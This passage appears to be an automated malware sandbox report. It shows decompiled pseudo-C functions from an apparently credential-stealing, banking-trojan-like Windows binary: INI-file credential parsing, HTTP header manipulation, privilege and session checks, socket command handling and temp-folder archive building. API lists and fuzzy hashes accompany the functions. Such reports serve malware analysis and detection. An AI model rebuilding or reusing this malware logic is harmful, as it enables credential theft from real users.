    				signed int _t123;
    				void* _t125;
    
    				_t81 = __ecx;
    				_t125 = (_t123 & 0xfffffff8) - 0x26c;
    				_t109 = __edx;
    				_t37 = __edx + 0x2c;
    				if(_t37 != 0) {
    					L1:
    					_t103 =  *_t37 & 0x0000ffff;
    					if(_t103 == 0x5c || _t103 == 0x2f) {
    						_t37 =  &(_t37[1]);
    						goto L1;
    					}
    				}
    				if(PathCombineW( &_v524, _t81, _t37) == 0) {
    					L28:
    					return 1;
    				} else {
    					if(( *_t109 & 0x00000010) == 0) {
    						_t106 = HeapAlloc( *0x42e6d4, 8, 0x20002);
    						_v620 = _t106;
    						if(_t106 != 0) {
    							_t43 = GetPrivateProfileStringW(0, 0, 0, _t106, 0xffff,  &_v532);
    							if(_t43 != 0) {
    								_t9 = _t43 + 1; // 0x1
    								if(E00411F50(_t106, _t9) != 0) {
    									_t47 = HeapAlloc( *0x42e6d4, 8, 0xc20);
    									_v632 = _t47;
    									if(_t47 != 0) {
    										_v628 = _t47 + 0x5fa;
    										E00424100(0x5c,  &_v616);
    										E00424100(0x5d,  &_v596);
    										E00424100(0x5e,  &_v584);
    										E00424100(0x5f,  &_v608);
    										while(1) {
    											_t116 = _v632;
    											if(GetPrivateProfileStringW(_t106,  &_v616, 0, _t116, 0xff,  &_v532) != 0) {
    												_t59 = GetPrivateProfileIntW(_t106,  &_v596, 0x15,  &_v532);
    												_v624 = _t59;
    												if(_t59 - 1 <= 0xfffe) {
    													_t117 =  &(_t116[0xff]);
    													if(GetPrivateProfileStringW(_t106,  &_v584, 0, _t117, 0xff,  &_v532) != 0) {
    														_t118 =  &(_t117[0xff]);
    														if(GetPrivateProfileStringW(_t106,  &_v608, 0,  &(_t117[0xff]), 0xff,  &_v532) != 0) {
    															if(E004206D0(_t118, _t106) > 0) {
    																_t119 =  &_v572;
    																E00424100(0x55,  &_v572);
    																_t66 = _v632;
    																_push(_v624);
    																_push(_t66);
    																_push(_t66 + 0x3fc);
    																_push(_t66 + 0x1fe);
    																_t120 = _v628;
    																_t69 = E00411D10(_t119, 0x311, _v628, _t119);
    																_t125 = _t125 + 0x14;
    																if(_t69 > 0) {
    																	_t121 = _a4;
    																	if(E00410D70(_t121, _t120, _t69) != 0) {
    																		 *((intOrPtr*)(_t121 + 4)) =  *((intOrPtr*)(_t121 + 4)) + 1;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    											_t55 = 0;
    											goto L22;
    											do {
    												do {
    													L22:
    													_t106 = _t106 + 2;
    												} while ( *((short*)(_t106 - 2)) != 0);
    												if( *_t106 != 0) {
    													goto L24;
    												}
    												E004107C0(_v632);
    												_t106 = _v620;
    												goto L27;
    												L24:
    												_t55 = _t55 + 1;
    											} while (_t55 != 1);
    										}
    									}
    								}
    							}
    							L27:
    							HeapFree( *0x42e6d4, 0, _t106);
    						}
    						goto L28;
    					} else {
    						E004207B0( &_v532, _a4);
    						return 1;
    					}
    				}
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 00420851
    • HeapAlloc.KERNEL32(?,00000008,00020002,?,?), ref: 00420890
    • GetPrivateProfileStringW.KERNEL32 ref: 004208B7
    • HeapAlloc.KERNEL32(?,00000008,00000C20,?,?), ref: 004208E1
    • GetPrivateProfileStringW.KERNEL32 ref: 00420947
    • GetPrivateProfileIntW.KERNEL32 ref: 0042095E
    • GetPrivateProfileStringW.KERNEL32 ref: 0042098D
    • GetPrivateProfileStringW.KERNEL32 ref: 004209B0
    • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 00420A4E
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$Heap$Alloc$CombineFreePath
    • String ID:
    • API String ID: 592523376-0
    • Opcode ID: d205f53b64e2acda715d4e58a0c22f4f34ab644108092b28765a51d56e244a55
    • Instruction ID: 29f842666c9642d1e9c20fe462c3a2e781653a8c70ea259202d2c11be5c7cc44
    • Opcode Fuzzy Hash: d205f53b64e2acda715d4e58a0c22f4f34ab644108092b28765a51d56e244a55
    • Instruction Fuzzy Hash: 6151B6727003156BD710DB55EC41FBB73E8EB98700F84442EBA54A7292DB78EC45CBA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0040BB80(void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				void* _v28;
    				void* _v32;
    				void* _v48;
    				void* _v52;
    				char _v76;
    				void* _v80;
    				void* _v84;
    				void* _v88;
    				void* _v116;
    				long _v120;
    				char _v128;
    				void* _v132;
    				void* _v133;
    				void* _v140;
    				void* _v148;
    				void* _v176;
    				void* _v181;
    				void* __edi;
    				void* __esi;
    				signed char _t76;
    				signed int _t78;
    				void* _t79;
    				signed int _t98;
    				intOrPtr _t99;
    				intOrPtr _t105;
    				intOrPtr _t106;
    				char _t108;
    				char _t114;
    				intOrPtr _t124;
    				intOrPtr _t125;
    				intOrPtr _t130;
    				intOrPtr _t131;
    				intOrPtr _t134;
    				intOrPtr _t135;
    				intOrPtr _t137;
    				intOrPtr* _t140;
    				char* _t142;
    				char* _t143;
    				char* _t144;
    				void* _t147;
    				void* _t154;
    				signed int _t159;
    				void* _t161;
    
    				_t161 = (_t159 & 0xfffffff8) - 0x7c;
    				_t140 =  &_v76;
    				_v120 = 0xffffffff;
    				if(E0040B920(_t140, _a4,  *_a8,  *_a12) == 0) {
    					L22:
    					E00425BD0( &_v76);
    					return _v120;
    				} else {
    					_push(_t140);
    					_t76 = E00424ED0();
    					_v120 = _t76;
    					if((_t76 & 0x00000001) == 0) {
    						if((_t76 & 0x00000002) != 0) {
    							_t114 = 0;
    							 *((char*)(_t161 + 0x13)) = 1;
    							if( *((intOrPtr*)(_t161 + 0x7c)) != 1) {
    								L9:
    								_t142 = _t161 + 0x24;
    								E004240C0(0x21, _t142);
    								HttpAddRequestHeadersA(_a4, _t142, 0xffffffff, 0xa0000000);
    								_t143 =  &_v128;
    								E004240C0(0x22, _t143);
    								HttpAddRequestHeadersA(_a4, _t143, 0xffffffff, 0x80000000);
    								_t144 = _t161 + 0x24;
    								E004240C0(0x23, _t144);
    								HttpAddRequestHeadersA(_a4, _t144, 0xffffffff, 0x80000000);
    							} else {
    								_t107 =  *(_t161 + 0x78);
    								if(( *( *(_t161 + 0x78)) & 0x00000003) == 0) {
    									goto L9;
    								} else {
    									_t108 = E00426020(_t107,  &_v76);
    									_t114 = _t108;
    									if(_t114 != 0) {
    										_v120 = 1;
    									} else {
    										 *((char*)(_t161 + 0x13)) = _t108;
    									}
    								}
    							}
    							EnterCriticalSection(0x42d3ec);
    							if( *((char*)(_t161 + 0x13)) == 0) {
    								L13:
    								E00425CF0( *((intOrPtr*)(_t161 + 0x80)),  *(_t161 + 0x78));
    								if(_t114 != 0) {
    									E00413040(_t114);
    								}
    							} else {
    								_t98 = E0040AAF0(_a4);
    								if(_t98 == 0xffffffff) {
    									goto L13;
    								} else {
    									_t99 =  *0x42d404; // 0x0
    									_t147 = _t98 + _t98 * 8 + _t98 + _t98 * 8 + _t98 + _t98 * 8 + _t98 + _t98 * 8;
    									E00425CF0( *((intOrPtr*)(_t147 + _t99 + 0x10)),  *((intOrPtr*)(_t147 + _t99 + 0xc)));
    									_t134 =  *0x42d404; // 0x0
    									E004107C0( *((intOrPtr*)(_t147 + _t134 + 0x14)));
    									_t124 =  *0x42d404; // 0x0
    									 *((intOrPtr*)(_t147 + _t124 + 0x14)) = 0;
    									_t135 =  *0x42d404; // 0x0
    									 *((intOrPtr*)(_t147 + _t135 + 0x1c)) = 0;
    									_t105 =  *0x42d404; // 0x0
    									 *(_t147 + _t105 + 0x18) = 0xffffffff;
    									_t125 =  *0x42d404; // 0x0
    									 *(_t147 + _t125 + 0xc) =  *(_t161 + 0x78);
    									_t106 =  *0x42d404; // 0x0
    									 *((intOrPtr*)(_t147 + _t106 + 0x10)) =  *((intOrPtr*)(_t161 + 0x7c));
    									_t137 =  *0x42d404; // 0x0
    									 *((intOrPtr*)(_t147 + _t137 + 0x20)) = _t114;
    								}
    							}
    							LeaveCriticalSection(0x42d3ec);
    							_t76 =  *(_t161 + 0x18);
    						}
    						if((_t76 & 0x00000004) != 0) {
    							 *_a8 =  *((intOrPtr*)(_t161 + 0x64));
    							 *_a12 =  *((intOrPtr*)(_t161 + 0x68));
    							EnterCriticalSection(0x42d3ec);
    							_t78 = E0040AAF0(_a4);
    							if(_t78 != 0xffffffff) {
    								_t130 =  *0x42d404; // 0x0
    								_t154 = _t78 + _t78 * 8 + _t78 + _t78 * 8 + _t78 + _t78 * 8 + _t78 + _t78 * 8;
    								_t79 =  *(_t154 + _t130 + 8);
    								if(_t79 != 0) {
    									HeapFree( *0x42e6d4, 0, _t79);
    								}
    								_t131 =  *0x42d404; // 0x0
    								 *((intOrPtr*)(_t154 + _t131 + 8)) =  *((intOrPtr*)(_t161 + 0x64));
    							}
    							LeaveCriticalSection(0x42d3ec);
    						}
    						goto L22;
    					} else {
    						SetLastError(0x2f78);
    						_v120 = 0;
    						E00425BD0(_t140);
    						return _v120;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0040B920: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B94C
      • Part of subcall function 0040B920: GetLastError.KERNEL32 ref: 0040B95A
      • Part of subcall function 0040B920: HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040B977
      • Part of subcall function 0040B920: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B988
      • Part of subcall function 00424ED0: EnterCriticalSection.KERNEL32 ref: 00424EF1
      • Part of subcall function 00424ED0: HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424F8E
      • Part of subcall function 00424ED0: HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424FA2
      • Part of subcall function 00424ED0: LeaveCriticalSection.KERNEL32(0042EE7C), ref: 00424FB5
    • SetLastError.KERNEL32(00002F78,?), ref: 0040BBCA
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BEA
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BFD
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C10
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C22
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C35
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C48
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C5A
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C6D
    • EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040BC8F
    • LeaveCriticalSection.KERNEL32(0042D3EC,?), ref: 0040BD41
    • EnterCriticalSection.KERNEL32(0042D3EC,?), ref: 0040BD66
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040BD97
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040BDB0
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$CriticalSection$EnterLeave$ErrorInternetLastOptionQuery$Alloc
    • String ID:
    • API String ID: 4292770527-0
    • Opcode ID: acea817ef5eae83ce0a47ad71bdbc41694b00d764553cade411570a922c6010e
    • Instruction ID: 75202b0bc1f6bc169339f11f2124a4a2e1f758cd914cbba951783f6418e73c76
    • Opcode Fuzzy Hash: acea817ef5eae83ce0a47ad71bdbc41694b00d764553cade411570a922c6010e
    • Instruction Fuzzy Hash: 17618E317043019BD724DF29D884A6BB7A5EF88314F94462EF955A73A2C734EC02CBD9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00412A50() {
    				void* _v4;
    				long _v8;
    				long _v12;
    				long _t15;
    				char* _t22;
    				signed char _t23;
    				DWORD* _t25;
    				void* _t27;
    				void* _t41;
    
    				_t27 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v4) == 0) {
    					L15:
    					return _t27;
    				}
    				if(GetTokenInformation(_v4, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L14:
    					CloseHandle(_v8);
    					goto L15;
    				} else {
    					_t15 = _v12;
    					if(_t15 == 0) {
    						goto L14;
    					}
    					_t41 = HeapAlloc( *0x42e6d4, 8, _t15 + 4);
    					if(_t41 == 0) {
    						L13:
    						goto L14;
    					}
    					if(GetTokenInformation(_v8, 0x19, _t41, _v12,  &_v12) != 0) {
    						_t22 = GetSidSubAuthorityCount( *_t41);
    						if(_t22 != 0) {
    							_t23 =  *_t22;
    							if(_t23 != 0) {
    								_t25 = GetSidSubAuthority( *_t41, (_t23 & 0x000000ff) - 1);
    								if(_t25 != 0) {
    									if( *_t25 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t27 = 3;
    									} else {
    										_t27 = 1;
    									}
    								}
    							}
    						}
    					}
    					HeapFree( *0x42e6d4, 0, _t41);
    					goto L13;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,00000000), ref: 00412A5F
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000), ref: 00412A84
    • GetLastError.KERNEL32(?,?,00000000), ref: 00412A8E
    • HeapAlloc.KERNEL32(?,00000008,?,00000000,?,?,00000000), ref: 00412AB2
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,?,00000000), ref: 00412AD0
    • GetSidSubAuthorityCount.ADVAPI32(?,?,?,00000000), ref: 00412AD9
    • GetSidSubAuthority.ADVAPI32(?,?,?,?,?,00000000), ref: 00412AF1
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 00412B1C
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00412B28
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$AuthorityHeapInformation$AllocCloseCountErrorFreeHandleLastOpenProcess
    • String ID:
    • API String ID: 1378796458-0
    • Opcode ID: df6bd0e676c3087d85eb3a086132e59f16c08b436c1e599be8fce4425e30eafd
    • Instruction ID: ae87eb89dce42ec5114923362b6b417fbdc31672980f19e300e35729d63cc19d
    • Opcode Fuzzy Hash: df6bd0e676c3087d85eb3a086132e59f16c08b436c1e599be8fce4425e30eafd
    • Instruction Fuzzy Hash: 6B21F1713483016FE6209F24EE84FE737A8EB94750F04482AF480E72A0D778F880CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E00406F20(intOrPtr _a4) {
    				char _v262;
    				char _v277;
    				signed char _v278;
    				char _v295;
    				char _v308;
    				signed char _v311;
    				char _v324;
    				signed char _v325;
    				signed char _v327;
    				void* __esi;
    				char* _t17;
    				signed int _t20;
    				signed int _t21;
    				signed char _t23;
    				void* _t31;
    				void* _t35;
    				intOrPtr _t36;
    				void* _t39;
    				char* _t41;
    				char* _t42;
    				char* _t43;
    				void* _t44;
    				signed int _t46;
    				signed int _t47;
    				signed int _t48;
    				signed int _t50;
    
    				_t36 = _a4;
    				_t17 =  &_v262;
    				__imp__#16(_t36, _t17, 1, 0, _t39, _t44, _t35);
    				if(_t17 != 1) {
    					L21:
    					if(_t36 != 0xffffffff) {
    						__imp__#22(_t36, 2);
    						__imp__#3(_t36);
    					}
    					return 0;
    				}
    				_t20 = _v278 & 0x000000ff;
    				if(_t20 == 0) {
    					_t46 = 1;
    					_t41 =  &_v277;
    					while(1) {
    						__imp__#16(_t36, _t41, _t46, 0);
    						__eflags = _t20;
    						if(_t20 <= 0) {
    							goto L21;
    						}
    						_t46 = _t46 - _t20;
    						_t41 = _t41 + _t20;
    						__eflags = _t46;
    						if(__eflags > 0) {
    							continue;
    						}
    						_t21 = _t20 & 0xffffff00 | __eflags == 0x00000000;
    						__eflags = _t21;
    						if(_t21 == 0) {
    							goto L21;
    						}
    						_t47 = 1;
    						_t42 =  &_v295;
    						while(1) {
    							__imp__#16(_t36, _t42, _t47, 0);
    							__eflags = _t21;
    							if(_t21 <= 0) {
    								goto L21;
    							}
    							_t47 = _t47 - _t21;
    							_t42 = _t42 + _t21;
    							__eflags = _t47;
    							if(__eflags > 0) {
    								continue;
    							}
    							if(__eflags == 0) {
    								goto L21;
    							}
    							_t23 = _v311;
    							__eflags = _t23;
    							if(_t23 == 0) {
    								goto L21;
    							}
    							_t48 = _t23 & 0x000000ff;
    							_t43 =  &_v308;
    							while(1) {
    								__imp__#16(_t36, _t43, _t48, 0);
    								__eflags = _t23;
    								if(_t23 <= 0) {
    									goto L21;
    								}
    								_t48 = _t48 - _t23;
    								_t43 = _t43 + _t23;
    								__eflags = _t48;
    								if(__eflags > 0) {
    									continue;
    								}
    								if(__eflags != 0) {
    									_t50 = E00410AA0( &_v324, 0xfde9, _v327 & 0x000000ff);
    									__eflags = _t50;
    									if(_t50 != 0) {
    										E0041EEC0(_v325 & 0x000000ff, _t50, _t36);
    										E004107C0(_t50);
    									}
    								}
    								goto L21;
    							}
    							goto L21;
    						}
    						goto L21;
    					}
    				} else {
    					_t31 = _t20 - 4;
    					if(_t31 == 0) {
    						E00409910(_t36);
    					} else {
    						if(_t31 == 1) {
    							E00408E30(_t36);
    						}
    					}
    				}
    			}






























    APIs
    • recv.WS2_32(?,?,00000001,00000000), ref: 00406F3C
    • recv.WS2_32(?,?,00000001,00000000), ref: 00406F85
    • recv.WS2_32(?,?,00000001,00000000), ref: 00406FB4
    • recv.WS2_32(?,?,00000001,00000000), ref: 00406FE1
      • Part of subcall function 00408E30: getsockname.WS2_32 ref: 00408E57
      • Part of subcall function 00408E30: send.WS2_32(?,?,00000002,00000000), ref: 00408EF2
    • shutdown.WS2_32(?,00000002), ref: 00407030
    • closesocket.WS2_32(?), ref: 00407037
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: recv$closesocketgetsocknamesendshutdown
    • String ID: p0u
    • API String ID: 2777429208-1742372003
    • Opcode ID: 4f0bb9fb1971ebb8521124b14128867041905cb79a610c5a8e4cce7cf11735e6
    • Instruction ID: c4e9ea77dc09e803a742c966447b88960b81782aaae1152bd9aa7b2bb713588a
    • Opcode Fuzzy Hash: 4f0bb9fb1971ebb8521124b14128867041905cb79a610c5a8e4cce7cf11735e6
    • Instruction Fuzzy Hash: CA314E7790432136D33056351D04FAB2A9C9B82751F450A3AF985FB3D1C63DD94A83DE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E0040F100(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char _v28;
    				char _v52;
    				char _v72;
    				char _v88;
    				struct HINSTANCE__* _v92;
    				_Unknown_base(*)()* _v100;
    				char _v104;
    				char _v108;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v140;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t27;
    				intOrPtr _t39;
    				intOrPtr _t43;
    				intOrPtr* _t47;
    				intOrPtr _t56;
    				CHAR* _t59;
    				CHAR* _t60;
    				CHAR* _t61;
    				void* _t62;
    				WCHAR* _t63;
    				void* _t65;
    				struct HINSTANCE__* _t66;
    				_Unknown_base(*)()* _t67;
    
    				_t63 =  &_v28;
    				E00424100(0xdd, _t63);
    				_t27 = LoadLibraryW(_t63);
    				_t66 = _t27;
    				_v92 = _t66;
    				if(_t66 == 0) {
    					return _t27;
    				}
    				_t59 =  &_v52;
    				E004240C0(0xde, _t59);
    				_t47 = GetProcAddress(_t66, _t59);
    				_t60 =  &_v88;
    				E004240C0(0xdf, _t60);
    				_v100 = GetProcAddress(_t66, _t60);
    				_t61 =  &_v72;
    				E004240C0(0xe0, _t61);
    				_t67 = GetProcAddress(_t66, _t61);
    				if(_t47 == 0 || _v100 == 0 || _t67 == 0) {
    					L15:
    					return FreeLibrary(_v92);
    				} else {
    					_t39 = E004129B0(L"SeTcbPrivilege");
    					__imp__WTSGetActiveConsoleSessionId();
    					_v100 = _t39;
    					if(_t39 != 0xffffffff) {
    						_push(_a8);
    						_push(_a4);
    						E0040F090(_t39, _t67);
    					}
    					_push( &_v104);
    					_push( &_v108);
    					_push(1);
    					_push(0);
    					_push(0);
    					if( *_t47() == 0) {
    						goto L15;
    					} else {
    						_t56 = _v128;
    						_t62 = 0;
    						if(_v124 <= 0) {
    							L14:
    							_v120(_t56);
    							goto L15;
    						}
    						_t65 = 0;
    						do {
    							_t16 = _t56 + 8; // 0xaa3b620a
    							_t43 =  *((intOrPtr*)(_t65 + _t16));
    							if(_t43 == 0 || _t43 == 4) {
    								_t52 =  *((intOrPtr*)(_t65 + _t56));
    								if( *((intOrPtr*)(_t65 + _t56)) != _v116) {
    									_push(_v12);
    									_push(_v16);
    									E0040F090(_t52, _t67);
    									_t56 = _v140;
    								}
    							}
    							_t62 = _t62 + 1;
    							_t65 = _t65 + 0xc;
    						} while (_t62 < _v124);
    						goto L14;
    					}
    				}
    			}


































    APIs
    • LoadLibraryW.KERNEL32(?,?,?,00000000,00000000), ref: 0040F118
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040F144
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040F15A
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040F172
    • FreeLibrary.KERNEL32(?,?,00000016,?,?,00000000), ref: 0040F22A
      • Part of subcall function 004129B0: GetCurrentThread.KERNEL32 ref: 004129BD
      • Part of subcall function 004129B0: OpenThreadToken.ADVAPI32(00000000), ref: 004129C4
      • Part of subcall function 004129B0: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 004129D7
    • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,00410118,?,?,?,?,00000000), ref: 0040F19B
      • Part of subcall function 0040F090: EqualSid.ADVAPI32(00000000,?,?,00000000), ref: 0040F0BA
      • Part of subcall function 0040F090: HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040F0DC
      • Part of subcall function 0040F090: CloseHandle.KERNEL32(?,?,00000000), ref: 0040F0E7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$FreeLibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualHandleHeapLoadProcessSession
    • String ID: SeTcbPrivilege
    • API String ID: 1519699699-1502394177
    • Opcode ID: c5759dd7a02fd55d0c3d2346e41300c66d7581252512014568da169ab7a21c23
    • Instruction ID: 6255a01f1a711ebcf4452ad06ba08e693cf7b1a17a16bc28e3e9621f36853e5e
    • Opcode Fuzzy Hash: c5759dd7a02fd55d0c3d2346e41300c66d7581252512014568da169ab7a21c23
    • Instruction Fuzzy Hash: 17319235604301ABD230EBA5D845B6B77E9EFC4304F04493EF985B7681DA79EC098BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00415FD0(WCHAR* _a4) {
    				void* _t19;
    				void* _t28;
    				void _t30;
    				void* _t40;
    
    				if(E00415F00() == 0) {
    					return 0;
    				} else {
    					_t40 = HeapAlloc( *0x42e6d4, 8, 0x954);
    					if(_t40 == 0) {
    						L7:
    						 *0x42e6e4 =  *0x42e6e4 - 1;
    						if( *0x42e6e4 == 0) {
    							FreeLibrary( *0x42e6e0);
    							_t19 =  *0x42d48c; // 0x0
    							HeapDestroy(_t19);
    						}
    						return 0;
    					} else {
    						_t2 = _t40 + 0x53e; // 0x53e
    						if(PathCombineW(_t2, _a4, 0) == 0) {
    							L6:
    							HeapFree( *0x42e6d4, 0, _t40);
    							goto L7;
    						} else {
    							_t3 = _t40 + 0x746; // 0x746
    							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t24 != 0x00000000) == 0) {
    								goto L6;
    							} else {
    								_t6 = _t40 + 0x132; // 0x132
    								_t7 = _t40 + 0x10; // 0x10
    								 *_t7 = 0x7fffffff;
    								 *((intOrPtr*)(_t40 + 0x14)) = 0x7fffffff;
    								 *((intOrPtr*)(_t40 + 0x24)) = 1;
    								 *((intOrPtr*)(_t40 + 0x28)) = 1;
    								E00410820(_t6, "cabinet.dll", 0xc);
    								_t11 = _t40 + 0x232; // 0x232
    								_t28 = E00410820(_t11, "?O", 2);
    								_t12 = _t40 + 4; // 0x4
    								_t30 =  *0x42dd0c(_t12, E00415E20, E00415860, E00415880, E00415B50, E00415BA0, E00415BE0, E00415C40, E00415C90, E00415CF0, E00415D50, _t28, _t40);
    								 *_t40 = _t30;
    								if(_t30 == 0) {
    									goto L6;
    								} else {
    									return _t40;
    								}
    							}
    						}
    					}
    				}
    			}








    APIs
      • Part of subcall function 00415F00: LoadLibraryA.KERNEL32(cabinet.dll,00415FD8,00000000,004162CF,?,74B5FBB0,00000000,?,?,00000001), ref: 00415F12
      • Part of subcall function 00415F00: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00415F32
      • Part of subcall function 00415F00: GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00415F44
      • Part of subcall function 00415F00: GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00415F57
      • Part of subcall function 00415F00: GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00415F6A
      • Part of subcall function 00415F00: HeapCreate.KERNEL32(00000000,00080000,00000000,00000001), ref: 00415F9A
      • Part of subcall function 00415F00: FreeLibrary.KERNEL32(?,00000001), ref: 00415FAF
    • HeapAlloc.KERNEL32(?,00000008,00000954,?,00000000,004162CF,?,74B5FBB0,00000000,?,?,00000001), ref: 00415FEE
    • PathCombineW.SHLWAPI(0000053E,?,00000000,?,00000001), ref: 0041600B
    • GetTempPathW.KERNEL32(00000103,00000746,?,00000001), ref: 00416025
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000001), ref: 004160D4
    • FreeLibrary.KERNEL32(?,?,00000001), ref: 004160E9
    • HeapDestroy.KERNEL32(00000000,?,00000001), ref: 004160F5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHeapProc$FreeLibrary$Path$AllocCombineCreateDestroyLoadTemp
    • String ID: cabinet.dll
    • API String ID: 4238409910-741892446
    • Opcode ID: 50142924199a26df4002a71b62eeb0398048c5d5f1fabf5a18f9a05558139dff
    • Instruction ID: c0fff5e9b443304ac0cd5daf90cc3cc83c7b18b5b5ed0e1af6bf9147383984e6
    • Opcode Fuzzy Hash: 50142924199a26df4002a71b62eeb0398048c5d5f1fabf5a18f9a05558139dff
    • Instruction Fuzzy Hash: 0721C371341B00EBD220DF619C49FD777ACEB58B15F90852AB645A61D0C7B8E485CB6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E004181D0(WCHAR* __edi) {
    				void* __esi;
    				long _t9;
    				void* _t10;
    				void* _t11;
    				signed int _t12;
    				void* _t14;
    				WCHAR* _t20;
    				WCHAR* _t23;
    				WCHAR* _t24;
    				void* _t25;
    				void* _t26;
    
    				_t23 = __edi;
    				if(GetTempPathW(0xf6, _t26 + 0x214) - 1 > 0xf5) {
    					L12:
    					return 0;
    				} else {
    					_t25 = 0;
    					while(1) {
    						_t9 = GetTickCount();
    						if(_t9 !=  *0x42dd08) {
    							 *0x42dd08 = _t9;
    							E00412320(_t9);
    						}
    						_t10 = E00412360();
    						_push( *((intOrPtr*)(_t26 + 0x420)));
    						_push(_t10);
    						_push(L"tmp");
    						_t24 = _t26 + 0x1c;
    						_t11 = E00411D10(_t10, 0x104, _t24, L"%s%08x.%s");
    						_t26 = _t26 + 0x10;
    						if(_t11 == 0xffffffff) {
    							goto L12;
    						}
    						_t20 = _t24;
    						while(1) {
